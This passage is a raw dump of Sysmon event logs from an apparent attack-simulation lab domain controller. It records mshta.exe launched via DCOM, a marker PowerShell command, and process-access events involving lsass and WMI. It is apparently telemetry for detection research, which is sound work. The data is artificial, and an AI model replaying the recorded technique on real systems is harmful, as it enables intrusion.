ll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030038Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.932{7901BC46-54A4-6008-CB06-00000000A301}1100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host 83ca34a0-c50d-44ef-b040-94893fd7d4db; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-54A4-6008-CA06-00000000A301}4472C:\Windows\System32\mshta.exeC:\Windows\System32\mshta.exe -Embedding 10341000x800000000000000030037Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.903{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-54A4-6008-CA06-00000000A301}4472C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030036Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.903{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-54A4-6008-CA06-00000000A301}4472C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030035Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.887{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-54A4-6008-CA06-00000000A301}4472C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030034Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.887{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-54A4-6008-CA06-00000000A301}4472C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030033Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.872{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-54A4-6008-CA06-00000000A301}4472C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030032Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.872{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-54A4-6008-CA06-00000000A301}4472C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030031Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.872{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-54A4-6008-CA06-00000000A301}4472C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030030Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.856{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-54A4-6008-CA06-00000000A301}4472C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030029Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.856{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030028Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.856{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030027Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.856{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030026Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.856{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030025Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.856{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-54A4-6008-CA06-00000000A301}4472C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030024Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.856{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-54A4-6008-CA06-00000000A301}4472C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030023Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.860{7901BC46-54A4-6008-CA06-00000000A301}4472C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXEC:\Windows\System32\mshta.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000030022Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.856{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030021Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.856{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030020Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.856{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030019Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.856{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030018Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030017Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030016Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030015Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030014Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.841{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030013Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 